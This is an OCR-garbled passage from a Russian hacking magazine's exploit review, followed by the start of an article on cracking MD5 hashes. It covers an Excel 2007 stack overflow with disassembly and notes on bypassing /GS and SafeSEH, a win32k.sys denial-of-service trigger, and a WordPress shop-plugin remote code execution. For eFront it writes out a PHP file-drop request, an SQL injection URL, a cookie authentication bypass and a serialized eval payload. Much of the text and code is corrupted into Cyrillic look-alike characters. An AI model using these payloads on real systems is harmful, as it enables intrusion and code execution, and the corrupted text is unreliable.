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@оЬ $1 а г I: {) ; 

[СІА55_5Е55І0Н_АСПОМ) ; 
іае&ЁІопАсІіоп - 5е&$іогАсиоп( ) ; 

ІіеІесІіейОосілпепІз - $5е55ІопАс1іоп->деХ( ) ; 

ІТ! геніоѵеТгзіипд51а5И($5е55іоі>Ас1:іоп->де1;РоІсІег[ ) ) = деХРагепХРдЩ $_Г05Т| ' іеГ] ) 
іЬ 51760? ($зеІесгегі0осишеп1:5 ) ) 

I 

і^{(?кру з аггау _^аг сИ(Ьа5епагпе($ Р05Т[ ‘ ів р 1 ) * $ьеІасІЕ[Юас;итеііі еі) ] Тніьс?) 

{ 

$$еіес?0йОосигпепі5І$кеу] = 5Р05Т1 'ѵаіие'] ; 

І5е55іопАсЬіоп ->5еІ ( $5еІес ХеШЭоситеп І5 ) ; 

> 

ЬазспатсІІ РОЩ'ісГІ) . "\п"; 
сііьрІйуАггау ($5сІі:сІЕ[ШаснпсііІ і) ; 

>еІьеі? ( гетоѵеТ гаП іпдБІаэИ ( ізеь а іопАсІіогі - >де! РоЫег ( Н — геіпоѵеТ гаШпдЗІаіЬ [ $ Р05ТГ " і-й ' 1 > ) 
{ 

$5е55іопАсі:х0п->5еіРоЫег($ РОЗТІ'ііГ ]) ; 

} 

игі*еІп?а{оЬ до? сІсап()); 



Фрагмент файла аіах_заѵе_пате.рИр 



соответствуетспецификации ВІРР8. Перечислим кратко некоторые 
положения этой спецификации, чтобы лучше понять суть работы 
эксплоита. ВІРР-структура представляетсобой идущие подряд 
записи: 

ВОР Туре ^могкЬоок §1оЬа1в 
ІлІогкЬоок §1оЬа1в 

ЕОР 

ВОР Туре - могквЬееІ: 

БЬееІ: гесогсів поток 
ЕОР 

ВОР Туре = ыогквЬееІ: 

БЬееІ: гесогсів поток 
ЕОР 



Все записи имеют следующий формат: 

ІР (два байта) 

Размер данных, 52 ( два байта) 

Данные (52 байт) 

Первые четыре байта (Ю и размер) — это за головок записи. За- 
писи могут группироваться в потоки. Ограничителями групп служат 
две специальные записи: ВОР (Ведіп О^РіІе) и ЕОР(Епб О^РіІе). Нас 
интересует ВОР, которая имеетследующий формат: 



і — т 

Смещ. 


Размер 


Значение 


Описание 




_ 


2 


0809Н 


ІР 




_ 


2 


0010Н 


размер 




00 


2 


0600Н 


версия 




02 


2 


****!_! 


тип 




04 


2 




ІР создания 




06 


2 




год создания 




08 


4 




флаг истории файла 




12 


4 




самая младшая версия 


Ехсеі, 








которая может читать 


записи 


из этого файла 


Типы ВОР-записей: 


0005Н 


- ІлІогкЬоок еІоЬаІв 







0ѲѲ6Н - Ѵівиаі Вавіс тосіиіе 
ѲѲ10Н - ІлІогквЬееІ: 

0020Н - СЬагІ 

0Ѳ4ѲН - ВІР Р4 Мае го вЬееі 

0100Н^ ВІРР4 ІлІогкЬоок §1оЬа1в 

На практике за записью ВОР может следовать не до куме нти- 
рованная запись со значением типа 0хА7. Эта запись имеет смысл 
только в том случае, если за ней идет другая запись со значением 
типа 0x3 С. При выполнении этих требований в стек копируется 
длина записей и происходит вызов функции зиЬ_30199Е55. Она 
при ни мает три аргумента. В первом аргументе содержится про- 
читанное из файла количество байт для копирования. Второй 
аргументопределяетадрес, куда копируются данные, атретий 
указывает максимальный объем данных, который может быть 
скопирован. 



.■Ьех*:3053Р830 


саіі 5иЬ 


301А0А01 


.■Ьех*:3053Р835 


стр еах. 


ЗСЬ 


.1=ех1=: 3053Р838 


тоѵ [еЬр+ѵаг_ЕР4] , еах 


.1=ех1=: 3053Р83Е 


ІП 2 Іос 30540488 


.■Ьехі:ЗѲ53Р844 


саіі виЬ 


301А0А01 


.1=ех1::3053Р849 


тоѵ есх. 


[еЬр+ѵаг_ЕРС] 


.■Ьех*:3053Р84Р 


ітиі есх 


, [еЬр+ѵаг Р00] 


.■Ьех*:3053Р856 


тоѵ есіі. 


еах 


.Іехі; : 3053Р858 


тоѵ еах. 


[еЬр+ѵаг_ЕЕ0] 


. 1=ех1= : 3053Р85Е 


Іеа еЬх. 


[есх+еах+3] 


. 1=ех1= : 3053Р862 


саіі виЬ 


301А0АВЕ 


Лех1=:3053Р867 


ривЬ ѲРРРРРРРРЬ 


.Ііехі: : 3053Р869 


рор есіх 




Лехі: : 3053Р86А 


виЬ есіх. 


есх 


.Ііехі: : 3053Р86С 


асісі еах. 


есіх 


.Іехі : 3053Р86Е ривЬ еах 


; Рв1= 


.1=ех1=:3053Р86Р 


ривЬ еЬх 


; іп~Е 


.1=ех1=:3053Р870 


тоѵ еах. 


есіі 


.Ііехі: : 3053Р872 


саіі виЬ 


30199Е55 



Проблема состоит в том, что в функции виЬ_30199Е55 не осу- 
ществляется должная фильтрация третьего аргумента, тогда как 
пользователь может контролировать его значение. Это значит, 
что в стеке можно перезаписать объем и адрес нужных данных. 
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риЫіс йТаИс сЬескРіІе($пате) { 

ІТ ($СЮВА151 'сопидигаМоп' ] [ " Ше Ьіаск ІІ5І 1 ] != ") { 

ІЫаскіЛт = ехр!огіе( , ”, $&ЮВД15[ ‘соп^ідигаііоп ' 1 [ н ^іІе ЬІаск Ііеі 1 ] ) ; 

} еіае { 

$Ыаскіі$і; = аггауП; 

} 

$Ыаск1_і5Т[] = 'рЬр'; 

5СХІСП5ІОП = ра(ІііпГо($пате, РАТНШО ЕХТЕМ5І0М) ; 

■рогѳасН ($ЫаскІ_І 5 І: а 5 $ѵа 1 ие) { 

іт ($ех1ел5іоп == тгіт(тЬ 5^гго1<жгег($ѵэ1иеШ { 

ІІігоы Е Т гот Рі іеЕхсерІ Іоп ( _ГОиСАННатиРІОАРРІІЕ 5 МХТНІНІ 5 ЕХТЕН 5 ІОН . 

1 : 1 . $ехТел 5 Іоп, ЕРгоп^РіІеЕхсерііоп: :РІІЕ ІЙІ ВІ.АСК ІІ 5 Т}; 

П 



Кодфункции СЬескРіІеО 



.Ііехі:: ЗѲ199Е6Ѳ сшр есіі. [езр+4+РзІі] 

. Ііехі:: ЗѲ199Е64 да 1ос_303ЕЕ1В7 
.Ііехі:: ЗѲ199Е6А тоѵ есх. [езр+4+аг§_0] 

.Ііех і:: 301 99Е6Е ризб еЬх 
.іех і:ЗѲ1 99Е6Г тоѵ еЬх, сімогсі_ 30Р726С0 
.Ііехіі: 30199Е75 ризб еЬр 

. Ііехі: : ЗѲ199Е76 тоѵ еЬр. пІМитЬегО-РВѵІіезТоКеасІ 
. Ііехіі :З Ѳ199Е7С ризб езі 
. Ііехіі :ЗѲ199Е7Р тоѵ [езр+ІѲб+РзІ:] , есх 



.Ііех іі : 301 99Е 93 тоѵ еах } [езр+106+РзІ:] 

. Ііехі: 30199Е97 ризб ез і : 5іге 
. Ііехіі :ЗѲ199Е98 Іеа есіх. сіыогсі 30Р6Е6В8[еЬх] 

. І іехіі : ЗѲ199Е9Е ризМ есіх ; 5гс 

. Ііехіі :30199Е9Р ризб еах ; Рзіі 

. Ііехіі :ЗѲ199ЕА0 зиЬ есіі. езі 

.І іехі: : ЗѲ199ЕА2 саіі тетсру 

.Ііехіі : 30199ЕА7 асісі [ езр+ІСИ+РзІі ] . езі 

.І іехіі : ЗѲ199ЕАВ асісі еЬх., езі 

. іехі : ЗѲ199ЕАР асісі езр, 0СМ 

. іехі : ЗѲ199ЕВѲ Ііезіі е сіі. есіі 

.іехі:ЗѲ199ЕВ2 тоѵ сІыопсІ_30Р72бС0. еЬх 

.Ііехі: : 30199ЕВ8 іпг Іос ЗѲ1Е0РВЗ 

Считается, что для уязвимостей типа переполнения буфера 
писать эксплоиты не сложно. Однако в данном случае одновре- 
менно используются защитные механизмы, включаемые флагами 
компилятора /05 и/5АРЕ5ЕН. Напомню, что /65 — это флаг для 
компилятора М5 ѴізиаІ 5іисІіо, отвечающий за внедрение меха- 
низмов, которые защищают буфер в стеке от переполнения. Если 
компилятор считает, что для функции возможно переполнение 
буфера, то в процессе компиляции он выделяет для нее память 
в стеке перед возвращаемым адресом. При входе в функцию в 
выделенную памятьзагружается объект безопасности соокіе, 
который формируется один раз при загрузке модуля. При выходе 
из функции и при обработке кадров в обратном порядке в 64- раз- 
рядных операционных системах вызывается вспомогательная 
функция, которая проверяет, не изменилось ли значение объекта 
соокіе. Если значение изменилось, то это может означать, что 
стек был перезаписан. При обнаружении измененного значе- 
ния процессзавершается./5АРЕ5ЕН защищаетустановленные 
5ЕН -об работники от перезаписи. Обработчик исключений 
представляет собой фрагмент кода, который выполняется в 
исключительных случаях, напримерпри попытке деления на 
ноль. Адрес обработчика хранится в стеке функции, и поэтому 
его вполне можно повредить. Входящий в состав ѴізиаІ 5іисІіо 
компоновщик поддерживает параметр/5АРЕ5ЕН для сохранения 



во время компиляции списка допустимых обработчиков исклю- 
чений в заголовке РЕ-образа. Если при выполнении возникает 
исключительная ситуация, операционная система проверяет пра- 
вильность адреса обработчика по заголовку образа. Если адрес 
неправильный, работа приложения прерывается. Но так как мы 
имеем доступ к тетсру, то сможем переписать стек после всех 
проверок, включаемых флагом /65. Когда управление вернется, 
в езр будет находиться контролируемое нами значение. Таким об- 
разом, мы сможем передать на негоуправление простым вызовом 
саіі езр. 



ТАК 6 ЕТ 5 



МісгозоІТ Оііісе ЕхсеІ 2007/МісгозоН Оііісе ЕхсеІ 2007 5Р2. 



боиліоы 



Существует обновление, устраняющее эту уязвимость. 

0 М511 -077 \ЛНп32к ЫиІІ Роіпіег йе-геГегепсе 
* ѴиІпегаЬіІіІуРОС 



СѴ55Ѵ2 7.2 



(АѴ: І_/АС : І_/Аи : N/0 : С/І : С/А: С] 

ші=и 

Дата релиза: 23 октября 2011 года. 

Автор: КЮеЬид. 

СѴЕ: СѴЕ-2011-1985. 

Уязвимостьнаходится в ѵѵіп32к.зуз и заключается втом, чтодля не- 
которых сообщений переда иное значение хэндл а окна не проверя- 
ется. Это позволяет нам осуществить атаку типа «Отказ в обслужи - 
вании» от имени локального пользователя. 



ЕХРЮІТ 



Возьмем для примера л истин г одной из уязвимых функций: 



. Ііехі: :ВБ9140С0 ШіІІзегТпІІМСВОХБТКІ N0(328 ргос пеаг 


: СОРЕ 


ХКЕР : хххОеТІлІіпсІоыРпос('х.х.х.х')+6Е 1 о 


.1іех1і:ВЕ9140С0 ; ІМІіЦзегМезза^еСаІНх.х.х.х.х.х.х^+бІІ р ... 

.іехі::ВР9140С0 


.іех1і:ВР9140С0 НШР 


= сіыогсі рііг 8 


.іехі::ВР9140С0 аг§ 4 


= сЫогсІ ріш 0СМ 


.іехі::ВР9140С0 аг§ 8 


= сішгсі ріш 106 


.іехі::ВЕ9140С0 аг§ С 


= сіыогсі ріг 146 


Лехі ВЕ9140С0 аг§_10 


= сіыогсі ріг 186 


Лехі ВР9140С0 аг§_14 


= СІЫОГСІ ріг 1С6 


.іехі:ВР9140С0 аг%_18 


= сішгсі ріг 206 
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Прыжок к началу полезной нагрузки 



В заключение перечислим все сообщения, использование которых в 
приведенном выше коде даетаналогичный результат — В5оР: 



СВ_А005ТКІІ\ІС 0x0143 



СВ ІІЧБЕКТБТКІІЧС 


0Х014А 


СВ РІІЧР5ТКІІЧ6 


0Х014С 


СВ 5ЕІ_ЕСТ5ТКІІ\ІС 


0Х014Р 


СВ РІІМРБТВІІМСЕХАСТ 


0x0158 


І_В_АРРБТКІІМ(з 


0x0180 


І_В ІІЧБЕКТБТКІІЧС 


0x0181 


І_В 5ЕІ_ЕСТ5ТКІІЧС 


0Х018С 


І_В РІІЧР5ТКІІЧ6 


0Х018Р 


І_В РІІЧР5ТКІІЧ6ЕХАСТ 


0Х01А2 


І_В ІІЧ5ЕКТ5ТКІІЧСІІРРЕК 


0Х01АА 


І_В_ІІЧ5ЕКТ5ТКІІЧСІ_ОІлІЕК 


0Х01АВ 


і_в аообткіічсііррек 


0Х01АС 


І_В АРРБТКІІЧСШлІЕК 


0Х01АР 



ііехі: : ВР9140С0 



ііехі: : ВР9140С0 


тоѵ 


есіі, есіі 


ііехі: : ВР9140С2 


риз И 


еЬр 


ііехі: :ВР9140СЗ 


тоѵ 


еЬр, езр 


іехі:ВР9140С5 


тоѵ есх. 


ГеЬр+НІлІІЧРІ 


; Если НіліШ 


== Ѳх-Р-Р-Р-Р-Р-Р-Р-Р (-1), ТО 


ііехі: : ВР9140С8 


тоѵ еах. 


Хесх+206] : В50Р 



ТАК6ЕТ5 



ѴѴіпсІоѵѵз ХР 5РЗ/ХР БР2 х64, ѴѴіпсІоѵѵз 2003 Бегѵег 5Р2 (+ ііапіит,х64], 
ѴѴіпсІоѵѵз Ѵізіа 5Р2/5Р2х64, ѴѴіпсІоѵѵз Бегѵег 2008 5Р2 х32/х64/ 
ііапіит, ѴѴіпсІоѵѵз 7 х32/х64, ѴѴіпсІоѵѵз 7 5Р1 х32/х64, ѴѴіпсІоѵѵз Бегѵег 
2008 г2х64/ііапіит, г2зр1 х64/ііапіит. 



зоиліоы 



Существует обновление для М51 1-077, устраняющее эту уязвимость. 



Функция ІѴІіІІзегМеззадеСаІІ вызывает МШзегіпІМСЕЮХБТРІІМб по 
индексу, связанному с номером сообщения СВ_А005ТРІІ\ІС: 

. ііехіі :ВР80ЕЕ6В ; іп1= зіісісаіі ІѴІііЦзегМеззаееСаІІГіпІ: . 
іпі. іпі ІІпісосІеБІігіп^. РѴОІР Асісігезз. іпі, іпі, іпі) 



■іехі: ВР8ѲЕЕВ1 ризіі [еЬр+аг§_18] : іпі 

■ ііехі: : ВР80ЕЕВ4 тоѵгх еах, сіз :_МеззаееТаЫе[еах] 

■ ііех і:: ВР 8ѲЕЕВВ ризіі есх ; іпі: 

■ ііехі: : ВР8ѲЕЕВС ризіі [еЬр+аг§_10] : іпі: 

. ііехі: : ВР8ѲЕЕВР апсі еах, ЗРіі 

■ ііехіі:ВР8ѲЕЕС2 ризіі [еЬр+АсІсІрезз] ; Асісігезз 

■ ііехіі: ВР80ЕЕС5 ризіі [еЬр+1)пісос!е5ігіп§] ; іпі: 

■ ііехіі: ВР80ЕЕС8 ризіі [еЬр+аг§_4] : іпі: 

■ ііех і:: ВР8ѲЕЕСВ ризіі езі ; іпі: 



■ ііех і:: ВР80Е ЕС С саіі сіз :_§ар-РпМезза§еСа11[еах*4] 

; №ЦзегТп1МБТК1М6МЦ1.их.х.х.х.х.х.х) 



. гсіаііа : ВР990Р68 еар-РпМеззаееСаІІ сісі оіізеі МіУзегіпМСРЕБТКОУШЗ 


. гсіаііа :ВР990Р68 


: РАТА ХКЕР: ІЧіІІзегМеззареСаІНх.х.х.х.х.х.х) 


. гсіаііа :ВР990Р68 


; ІЧіІІзегРпІЧСРЕБТКОУ ( х.х.х.х.х.х.х) 


. гсіаііа : ВР990В6С 


сісі оіізеі ІЧіІІзег-РпІЧСРЕ5ТКОУ@28 


: ІЧіІІзегРпІЧСРЕБТКОУ ( х,х,х,х,х,х,х) 


. гсіаііа : ВР990Р70 


сісі оіізеі ІЧіизег-РпІІЧІ_РСКЕАТЕ5ТКиСТ(а)28 


: ІЧіІІзегРпІІЧІ-РСКЕАТЕБТКІІСТ (х.х.х.х.х.х.х) 






. гсіаііа :ВР990РР4 


сісі оіізеі 1Ч^зег-Рп11ЧСВОХ5ТК11ЧОЭ28 



; ^ЦзегТпШСВОХБТКТМбГх.х.х.х.х.х.х^ 



Для того чтобы успешно проэксплуатировать эту уязвимость, не- 
обходимо выполнитьфункцию 

5епс1Ме5за§еСа11Ьаск( (НМІ\ІР) -1,СВ_А°в5ТК11\1С, 0,0,0, 0^ 
или 

БепсІІЧоіі-руМеззаее ( (НЫІЧР) -1 , СВАРР5ТКІІЧ6 ,0,0); 



3 



Удаленное выполнение кода в ѴѴогсІргезБ 
2іпдігі ѴѴеЬ 5Иор РІидіп 



СѴ55Ѵ2 



7.5 



(: Ы/АС: Ь/Аи : N/0: Р/І : Р/А: Р) 

шшэ 

ѴѴогсІРгезз уже давно вышел за рамки простой платформы для 
ведения блогов. Теперь к нему можно прикрутить немыслимое ко- 
личество плагинов, вплоть до тех, которые отвечают за внедрение 
электронной коммерции. Сегодня нашим подопытным стал один 
из таких плагинов — плагин для создания онлайн- магазина, — что 
еще раз доказывает беспечность некоторых программистов при 
разработке продуктов, на которые в первую очередь падает взор 
людей в черных шляпах. Уязвимость обнаружил исследователь 
Едісііо Ротапоака ЕдіХв конце октября. Хороший мальчик Ед ІХ 
отправил разработчикам отчет о баге и только 13 ноября, после вы- 
хода исправленной версии, обнародовал подробную информацию 
обуязвимости. 



ЕХРЮІТ 



Интересующий нас код содержится в функции /іѵѵз/асі 6 опз/ 
ііпутсе/]5сгірі5Ліпу_тсе/рІидіп5/а]ахііІетападег/а]ах_5аѵе_ 
пате.рЬр, строчки 37-56 представлены на соответствующем 
рисунке. Здесь мы можем повлиять на значение массива 
$зеІесіесЮоситепі5 через Р05Т- пара метр ѵаіие. Затем нужно 
отобразить содержимое $зеІесіесЮоситепі5 с помощью функции 
сІізрІауАггауП и вызвать функцию ѵѵгііеІпіоП, использующую со- 
держимое буфера, где находится $зеІесіесЮоситепі5. Рассмо- 
трим функцию ѵѵгііеіпіо! ), находящуюся по адресу /іѵѵз/асісіопз/ 
ііпутсе/І5сгірі5/ііпу_тсе/рІидіпз/а]ахііІетападег/а]ах_сгеаіе_ 



(оІбег.рЬр: 

Типсііоп мгііе!п-Ро($сІаіа, 


$сІіе = -Раізе) 


{ 


$-рр = @-Рореп(сІігпате( 


РНЕ ) . 


РІКЕСТОКУ 5ЕРАКАТОК 


. 1 сіаііа . рИр ' , 'ѵн-' ) : 


(аНіл/гііе($-Рр. $сІаіа); 
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ВЗЛОМ/ОБЗОР ЭКСПЛОИТОВ 



1 іѵГліци! ІІ.Н 

• • ■І'ІІІПІ 1 ГѴТ.[іДі| • ■!->!> ЧЯІ л ! ■ 

и іііійщ ишокі'і 1 1 . - і ■. іь 1 ] и і уизлі ш-*]) ■, 

іёптіе^ - йггл^іі йЕ5*5]ЗД{ Ій'] «о и . і. 

^ йіій \ 

ІБпШр - іггл-гііі -> Ч^Е«а'|р 

1 

ІиГІРйПІ - йЪШ иЛИиЛі: 

Мие'уГй' ЕІ * 4 «СДМ* 1 1 ■ 1 . 1иіГ№іАГ С 1 1 ' Фіп 1 у ' \ \ ; 

ІвИКЩІфііГУГЧ-гті 4 -к ІрПГЕ) { 
ітиІЕ - ^(ЯИЛІ*-*.. ІрЭГЕЗі: 
ічі«Ь і №№ІТ|в| I ^ 

«И - •■ V ЦП 1 1 ■ і 

?■!* ; . • іЗ- 10': - і#гйуЦг*яиШЗ| -* 'чип ']! ЬгмЬ: 

ЙН ИИ : ЬГ4ЛИ; 

} 

тііч»-п ІвпРіЕт; 



Кодфункции 6еШ5егТітеТагдеІ() 

@-Рыгі1:е($-рр. "\п\п" . с!а1=е( ' сІ/М/У Н : і : 5 ' ) ); 
(Э-Есіозеб^-Рр) ; 



0 да! Она записывает переданные ей данные в файл баіа.рбр, что 
позволяет атакующему исполнить произвольный код на уязвимой 
системе с привилегиями веб-сервера. Эксплоит для этого бага 
доступен на ехрІоіІ-сІЬ.сот [ЕРВ-ІР: 18111]. Он написан на РНР, 
поэтому для его использования необходимо установить интерпре- 
татор языка РНР. Для винды тебе придется скачивать и н сталл ер 
с официального сайта, а для ли ну ксо в достаточно одной команды 
пакетного менеджера, например: 

// для АгсН ІЛпих 

# растап -5 рбр 

// для РеЬіап-ЬазесІ 

# ар1:-§е1: ^.пз1:а11 рбр 



Использовать эксплоит достаточно просто: 



$ рбр 18111. рбр <Іі05І:> <ра1:1і> 



Здесь <Ьоз1> — на именован ие хоста, <раШ> — путь кѴѴогсІРгезз. 
Стоит отметить, что та кой же ба г присутствует в а налоге этого пла- 
гина для Эоотіа!, нотам он неэксплуатабелен из-за неподходящего 
значения переменной С0І\ІРІ6_5Ѵ5_Р00Т_РАТН. 



і~Р ($_ Р05Т[ ЧетрІаІгеІМате ' ] ) { 

$с!іп = сопііепіі/есііііогііетріаііез/ 1 . 

$_5Е55ІОІМ[ 1 з_1о§іп 1 ] ; 

і-р ( ! із сИг($сііг) && ! тксІіг($сІіг д _0755) ) {_ 

ІгРігоы пеы Ехсер^іопР СОШРМОТСКЕАТЕРІКЕСТОКУѴ. 

} 

$б1епаше = $с!іг. ' /' . $ Р05Т[ ' ІіетрІаІіеІМате ' ] . ' . РгЕтІ' ; 

$1=етр1а1=еСоп1:еп1= = $ Р05Т[ ЧетрІаІгеСопІіепІ: ' ] ; 

І-Р(б1е_ехі5іі5($б1епате) === -Раізе) { 

$ок ^Л1е_ри1:_соп1:еп1:5($б1епате л 
$1:етр1а1:еСоп1:еп1:) ; 
сбтосІ($61епате., 0644); 

Данные пользователя, передаваемые в функцию61е_ри1_ 
соп-реп1з() через параметры $_Р05Т[Четр1а-реМате'] и $_ 

Р05Т[ ' ІіетрІа'ІіеСопІіепІ; ' ], никак не фильтруются. Таким образом, 
атакующий, который имеетаккаунт в системе, можетзаписать 
произвольный код в файл с расширением рбр, если включена 
директива тадіс_циоІез_дрс. Запрос, эксплутирующий эту 
уязвимость, выглядиттак: 

Р05Т /е-ргопіі/ыыы/есііііоп/іііпу тсе/ріи^іпз/ 
заѵе_1:етр1а1:е/5аѵе_1:етр1а1:е . рбр НТТР/1 . 1 
Нозі:: Іосаібозі: 

Соп1=еп1=- Беп^ІіИ : 60 

Сопііепіі-Туре: арр1іса~Ьіоп/х-мыы-Тогт-иг1епсосІесІ 

Соппесіііоп: кеер-аііѵе 

1:етр1а1:еІМате=5Іі . рбр%ѲѲ&1:етр1а1:еСоп1:еп1:= 

< ? рМр еѵіі сосІеП ; ?> 

2. Загрузка произвольныхфайлов. Уязвимый код содержится в функ- 
ции сЬескРіІеП, которая находится в файле/ІіЬгагіез/ПІезузІет. 
сіазз.рбр, строки 3143-3154 представлены на соответствующем 
рисунке. Метод РіІе5узІетТгее::ирІоасІРіІе(), отвечающийза 
загрузку всехфайлов, использует сЬескРМеО для проверки рас- 
ширения загружаемого файла. Она, в свою очередь, сравнивает 
расширение с элементами черного списка ЯІе_Ыаск_ІізІ, в число 
которых поумолчанию входятрбр, рбрЗДзр, азр, сді, рі, ехе, сот, 
ЬаЕ Благодаря этому атакующий можетзапростозагрузитьаватар 
срасширением рбр. 



ТАР6ЕТ5 



ѴѴогсІргезз^іпдігіѴѴеЬЗбор РІидіп от 0.9.1 2 до 2.2.3. 



боклкм 



Обновиться до версии 2.2.4 или более поздней. 



4 



Множественные уязвимости в еРгопІ 



СѴ55Ѵ2 



7.5 



( АѴ: Ы/АС: Ь/Аи: Ы/С: Р/І : Р/А: Р) 

Щ|:У 

В конце октября исследователь под ником ЕдіХ опубликовал 
информацию о целой пачке уязвимостей в популярном за рубежом 
корпоративном продукте еРгопЕ Этот продукт интересен хотя бы 
просто потому, что на его примере можно рассмотреть большинство 
широко распространенных в настоящее время уязвимостей в веб- 
приложениях и понять, какие надо программировать. 



ЕХРЮІТ 



1. Удаленное выполнение кода. Важный код содержится в файле 
/ѵѵѵѵуѵ/ебіІогЛіпу_тсе/рІидіп5/5аѵе_ІетрІаІе/заѵе_ІетрІаІе.рІ"ір 
(строки 8-18): 



3. ЗОБ-инъекция через оператор ІІРОАТЕ. Рассмотрим код 
функции деШзегТітеТагдеШ, которая находится в/ІіЬгагіез/ 
ІооІз.рЬр: он представлен на соответствующей картинке. Эта 
функция парсит переданную ей ссылку и, если находит пара- 
метр раскаде_Ю, использует её значение как индекс в массиве 
$епШу. Чтобы понятьсуть проблемы, заглянем в код/ѵѵѵѵѵѵ/ 
регіосііси рсіаіег. рЬ р: 

ІІІ_ ($_5Е55ІОІ\І[ '_з_1о§іп ' ] ) { 

$еп1=і1=у = ееІгЦзегТітеТагееШ 6ЕТ['НТТР КЕРЕКЕК']); 
//$еп1:і1:ѵ = $ 5Е55ІОІМ[ ' з іііше ііап^еі: ' ] ; 

//Црсіаііе Ііітез -Рог Іібіз епІігЕу 

$гези!1: = еР_ехеси1:еІ\1еі\/(' , ирсІа1:е изегііітез зеі: 1:іте=1:іте+(" 
.1:іте() . 

" -1:іте5І:атр_поы) , 1:іте5І:атр_поы= " 

.1:іте() . 

"ыбеге зеззіоп ехрігесі = 0 апсі зеззіоп сизііот ісіепііібег = 
$_5Е55ІОІМ[ ' 5_си5І:от_ісІеп1:ібег 1 ] . 

" ' апсі изегз БСХзІІМ = ' " . 

$_5Е55ІОІ\І[ ' з_1о§іп ' ] . 

" ' апсі е піііііѵ = ' " . 
сигпеп1:($еп1:і1:у) . 

" ' апсі еп іііііу іс і = 1 " . 
кеѵ($е п1=і1= у) . 

).; 
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Данные, содержащиеся в $_ОЕТ[ , НТТР_РЕРЕРЕР'], пере- 
даются в функцию деШзегТітеТагдеД), а возвращаемое 
значение используется при последующем вызове функции 
еР_ехесиІеМеѵѵ(). Таким образом, для внедрения произвольного 
5СП--ВЫ ражен ия атакующий может за просить II РІ_ следующего 
вида: 

ІтЕір: //ІосаІІіозІі/еТгопІі/ымм/регіосІісирсІаІіег . ріір? 
НТТР_КЕРЕКЕК=Н1:1:р://Но5І:/?раскаёе_ІР=[50І.] 

В последних версиях продукта данные берутся из переменной 
$_5ЕРѴЕР['НТТР_РЕРЕРЕР'], что, в общем -то, никак не влияет на 
баг. Для успешной реализации атаки необходимо иметь аккаунт 
в системе. 

4. Обход аутентификации и повышение привилегий. Уязвимый код 
находится в/ѵѵѵѵѵѵ/іпсІех.рЬр: 

(І5зе1:($_С00КІЕ[ ' соокіе_1о§іп ' ] ) 

&& іззе1:($ СООКІЕ[ Чоокіе раззмогсГ ] )) 

{ 

Тгу { 

$ызег = ЕТгоп1:ІІ5егРас1:огу : : Тас1:огу( 

$_СООКІЕ [ ' соокіе_1о§іп ' ] ) ; 

$ызег -> 1о§іп($_СООКІЕ[ ' соокіе_ра55ыопсІ ' ] ^ Тгие); 

Данные в $_СООКІЕ['соокіе_Іодіп'], используемые для создания 
нового объекта с помощью метода ЕІТопШзегРасІогуіТасІогуО, 
не фильтруются, благодаря чему можно обойти аутентификацию 
и повысить привилегии: 

СЕТ /еТгоп1:/ыыы/іпсІех. рбр НТТР/1 . 1 
Ноз±: Іосаіііозі: 

Соокіе : соокіе_1о§іп=ас!тіп ; соокіе_1о§іп=1 ; соокіе_ 
1о§іп=асІтіпІ5І:па1:ог; соокіе_1о§іп=1; соокіе_раззѵ\/огсІ=1 
Соппесіііоп: кеер-аііѵе 

5 . Внедрение произвольного РНР- кода. Уязвимый кусок кода на- 
ходится в/ѵѵѵѵѵѵ/зІисІепЕрЬр: 

і-р (І55е1=($_6ЕТ[ 'соигБе' ]) || 
іззе1:($_СЕТ[ '-Рпот_соиг5е ' ])) 

{ 

і-р ( $_6ЕТ[ ' соигзе ' ] ) 

{ 

$соигзе = пеы Е-Ргоп1:Соиг5е($ _6ЕТ[ 'соигзе' ] ); 

} еізе { 

$соигзе = пеы Е-Ргоп-ЬСоигзеРФ 6ЕТ[ '-Ргот_соигзе ' ]); 

} 

$е1і§іЬі1і1:у = $соигзе -> сбескКи1ез( 
$_5Е55ІОІ\І['з_1о§іп']); 

Данные, находящиеся в $_0ЕТ[ , соигзе'] или $_0ЕТ[Тгот_ 
соигзе'], не фильтруются перед созданием нового объекта 
ЕітопіСоигзе, что позволяет выполнить код, так как в процессе 
создания объекта вызывается функция еѵаІ(): 

/зііисіепіі.ріірріеззопз ІР=1&соигзе[ісІ]=1&соиг5е 
[сІігес1=іоп5_ІР]=1&соип5е[пи1е5]=а:1:{5:19: "1] ; 
рЬріп-РоР ^ ісііе; / *" ;а :1: {з :б: "Іеззоп" ;і:0; }} 



ТАР6ЕТ5 



еРгоп»<=3.6.10(ЬиіІсі 11944]. 



БОКЛКМ 



Обновиться доболеепоздней версии. □С 



Электронные книги 




ШЕИЕЕК.ЫЮК ЕНЮ1 



Ѵ/ЕХІЕН 



\ 

Я 

і 



№ лтцй к і нунму^і нннг I НІШ.* 
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Илья Вербицкий (Ыод.сНіѵаѵаз.огд) 



ШТУРМ 

М05 

ВСЕ МЕТОДЫ ВЗЛОМА 
ПОПУЛЯРНОГО АЛГОРИТ- 
МА ХЕШИРОВАНИЯ 




ІШП 

Видеокарта АН 
Касіеоп НО 4850 
Х2 позволяет 
генерировать до 2,2 
миллиардовхешей в 
секунду! 

Использование ал- 
горитма Мй5 в ЭЦП 
неприемлемо вслед- 
ствие недостаточной 
устойчивости этого 
алгоритма к поиску 
коллизий. 



І'М'.'І 

ЫМу/уЕИсііг 

— добавление 
нового алгоритма 
хеширования в 
ГСаіпЬоѵѵСгаск при 
помощи АРІ. 

ЬіЫу/ѵТ5В9К — 

описание формата 

«радужной» 

таблицы. 



ггп 

На нашем диске 
ты сможешь 
найти подробное 
обучающее видео и 
соответствующие 
программы для 
реализации всех 
описанных в статье 
способов взлома 
МР5. 




Ни для кого не секрет, что криптография проч- 
но вошла в нашу жизнь. Интернет-сервисы, 
социальные сети, мобильные устройства — 
все они хранят в своих базах пароли пользова- 
телей, зашифрованные с помощью различных 
алгоритмов. Наиболее популярным таким ал- 
горитмом сегодня, безусловно, является Мй5. 

О способах его взлома и пойдет речь. 



НЕМНОГО О КРИПТОГРАФИИ 

Современная криптография включает в себя три направления: шиф- 
рование с закрытым ключом, шифрование с открытым ключом и хе- 
ширование. Сегодня мы поговорим о том, что такое хеширование и с 
чем его едят. В целом под хешированием понимают преобразование 
входных данных произвольной длины в выходную битовую строку 
фиксированной длины. Чаще всего хеш-функции применяют в про- 
цессе аутентификации пользователя (в базе данных обычно хранит- 
ся хеш пароля вместо самого пароля) и для вычисления контрольных 
сумм файлов, пакетов данных и т. п. Одним из наиболее известных и 
широко используемых алгоритмов хеширования является Мй5. 

НАЧАЛО 

Алгоритм М05 представляет собой 128-битный алгоритм хеширо- 
